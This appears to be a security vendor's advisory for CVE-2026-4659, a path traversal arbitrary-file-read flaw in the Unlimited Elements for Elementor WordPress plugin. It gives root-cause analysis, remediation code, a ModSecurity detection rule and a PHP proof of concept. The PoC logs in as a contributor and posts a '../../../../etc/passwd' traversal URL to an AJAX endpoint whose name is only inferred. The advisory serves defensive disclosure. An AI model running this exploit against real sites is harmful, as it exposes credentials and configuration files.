Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: April 17, 2026

CVE-2026-4659: Unlimited Elements For Elementor <= 2.0.6 – Authenticated (Contributor+) Arbitrary File Read via Path Traversal in Repeater JSON/CSV URL with Path Traversal (unlimited-elements-for-elementor)

CVE ID: CVE-2026-4659
Severity: High (CVSS 7.5)
CWE: 22
Vulnerable Version: 2.0.6
Patched Version:
Disclosed: April 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4659 (metadata-based):
This vulnerability is an authenticated path traversal flaw in the Unlimited Elements for Elementor WordPress plugin. It allows attackers with Contributor-level access or higher to read arbitrary files from the server’s filesystem. The flaw resides in the plugin’s handling of URLs for JSON or CSV data sources in a repeater widget, specifically within the URLtoRelative() and urlToPath() functions.

Atomic Edge research infers the root cause from the CWE-22 classification and the provided description. The URLtoRelative() function likely strips the site’s base URL from a user-supplied input via a simple string replacement. This process fails to sanitize directory traversal sequences like ‘../’. The cleanPath() function then normalizes directory separators but does not remove these traversal components. The description confirms these function behaviors. This allows a crafted URL containing path traversal sequences to bypass intended restrictions.

Exploitation requires an authenticated user to interact with a vulnerable widget setting that accepts a remote URL for JSON or CSV data. The attacker would supply a URL like http://victim-site.com/../../../../etc/passwd. After the plugin processes this URL, the domain is stripped, leaving a relative path with traversal sequences. This path is then concatenated with a base directory path and resolved, leading to the reading of a sensitive file outside the web root. The exact administrative endpoint (likely an AJAX handler or widget save action) is not specified in the metadata, but the attack vector involves a POST request to a plugin-specific action.

Effective remediation requires implementing proper path validation. The fix should validate that the final resolved path remains within an allowed directory, such as the WordPress uploads directory or a temporary cache folder. This can be achieved by using realpath() and checking the result against a whitelist, or by using basename() if only filenames are needed. The patched version 2.0.7 presumably adds such sanitization to the URLtoRelative() and cleanPath() functions or introduces a new validation layer.
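As an added example (not code from this advisory or from the plugin itself), the weak URL-to-path conversion the analysis describes is shown beside a hardened version that applies the realpath() containment check from the paragraph above. The function names, parameters and the base directory are assumptions for illustration; the traversal URL is the one quoted in the analysis.

```php
<?php
// Added example, not the plugin's code: the weak URL-to-path conversion the
// analysis describes, beside a hardened version with a realpath() containment
// check. Function names and the base directory are assumptions for illustration.

// Weak: strip the site URL with a plain string replace, normalize separators,
// and concatenate. "../" segments survive, so the result can leave $base.
function weakUrlToPath(string $url, string $siteUrl, string $base): string {
    $relative = str_replace($siteUrl, '', $url);        // "/../../../../etc/passwd"
    $relative = str_replace('\\', '/', $relative);      // separator cleanup only
    return rtrim($base, '/') . '/' . ltrim($relative, '/');
}

// Hardened: accept only URLs on this site, resolve with realpath(), and require
// the resolved path to stay inside $base. realpath() returns false for a path
// that does not exist, which is fine here because the data file must exist.
function safeUrlToPath(string $url, string $siteUrl, string $base): ?string {
    $site = parse_url($siteUrl);
    $u    = parse_url($url);
    if ($u === false || ($u['host'] ?? null) !== ($site['host'] ?? null)) {
        return null;                                     // foreign or unparsable host
    }
    $relative = $u['path'] ?? '';
    $sitePath = rtrim($site['path'] ?? '', '/');
    if ($sitePath !== '' && strpos($relative, $sitePath . '/') === 0) {
        $relative = substr($relative, strlen($sitePath)); // drop install subdirectory
    }
    $baseReal  = realpath($base);
    $candidate = realpath(rtrim($base, '/') . '/' . ltrim($relative, '/'));
    if ($baseReal === false || $candidate === false) {
        return null;                                     // missing base dir or file
    }
    // Containment: the resolved path must be $base itself or a descendant of it.
    if ($candidate !== $baseReal
        && strpos($candidate, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                     // escaped the allowed directory
    }
    return $candidate;
}

// Demo against a constructed temporary directory so the script runs offline.
$base = sys_get_temp_dir() . '/ue-demo-' . getmypid();
mkdir($base . '/data', 0700, true);
file_put_contents($base . '/data/items.json', '[]');
$site = 'http://victim-site.com';
var_dump(weakUrlToPath($site . '/../../../../etc/passwd', $site, $base)); // outside $base
var_dump(safeUrlToPath($site . '/../../../../etc/passwd', $site, $base)); // NULL
var_dump(safeUrlToPath($site . '/data/items.json', $site, $base));         // inside $base
```

The string-prefix comparison against realpath() output is what makes the check robust: it holds regardless of how many "../" segments, encoded or not, the input carried.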

The impact of successful exploitation is significant information disclosure. An attacker can read the WordPress configuration file (wp-config.php), which contains database credentials and secret keys. Other sensitive files like /etc/passwd, SSH keys, or application logs are also accessible. This data can enable further attacks, including full database compromise and site takeover. The CVSS score of 7.5 (High) reflects the high confidentiality impact with no authentication requirement for the network attack vector.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-4659 (metadata-based)
# This rule targets the path traversal via the Repeater JSON/CSV URL parameter.
# The rule blocks requests to the plugin's AJAX handler containing path traversal sequences in a specific parameter.
# The exact action name is inferred; adjust if the real hook differs.
# REQUEST_FILENAME excludes the query string, and @endsWith also covers WordPress installs in a subdirectory.
# Multi-line rules need a trailing backslash on every continued line.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:20264659,phase:2,deny,status:403,chain,msg:'CVE-2026-4659 via Unlimited Elements for Elementor AJAX - Path Traversal',severity:'CRITICAL',tag:'CVE-2026-4659',tag:'WordPress',tag:'Plugin',tag:'Unlimited-Elements',tag:'Path-Traversal'"
  SecRule ARGS_POST:action "@streq unlimited_elements_ajax_action" "chain"
    # Match a literal ".." segment bounded by a slash, backslash, start or end of the value.
    # Two urlDecodeUni passes handle both %2e%2e and double-encoded %252e%252e.
    SecRule ARGS_POST:url "@rx (?:^|[\x5c/])\.\.(?:[\x5c/]|$)" \
      "t:none,t:urlDecodeUni,t:urlDecodeUni,t:lowercase,t:removeNulls"

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4659 - Unlimited Elements For Elementor <= 2.0.6 - Authenticated (Contributor+) Arbitrary File Read via Path Traversal in Repeater JSON/CSV URL with Path Traversal
/*
 * Proof of Concept for CVE-2026-4659.
 * This script simulates an authenticated attack to read a local file via path traversal.
 * The exact AJAX action or endpoint is inferred from common plugin patterns.
 * Assumptions:
 *   1. The attacker has valid Contributor-level credentials.
 *   2. The vulnerable parameter is part of a widget save or preview request.
 *   3. The endpoint is likely /wp-admin/admin-ajax.php with an action related to 'unlimited_elements'.
 */

$target_url = 'https://victim-site.com'; // CHANGE THIS
$username = 'contributor_user';          // CHANGE THIS
$password = 'contributor_pass';          // CHANGE THIS
$file_to_read = '/../../../../etc/passwd'; // Target file via traversal

// Construct the malicious URL. The plugin's URLtoRelative() will strip the domain.
$malicious_url = $target_url . $file_to_read;

// Login to obtain authentication cookies
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$login_response = curl_exec($ch);

// Check login success (simple check for dashboard redirect)
if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
    die("[!] Login failed. Check credentials.");
}

echo "[*] Logged in successfully.\n";

// Send exploit request. The exact parameter name is inferred; common names include 'url' or 'csv_url'.
// The action is assumed to be a plugin-specific AJAX hook.
$exploit_params = array(
    'action' => 'unlimited_elements_ajax_action', // Inferred placeholder
    'url' => $malicious_url,                      // Inferred vulnerable parameter
    'nonce' => 'placeholder_nonce'                // Would need a valid nonce in real scenario
);

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_params));
$exploit_response = curl_exec($ch);
curl_close($ch);

// Output the response which may contain the file contents if debug output is enabled.
echo "[*] Response:\n";
echo $exploit_response;
?>
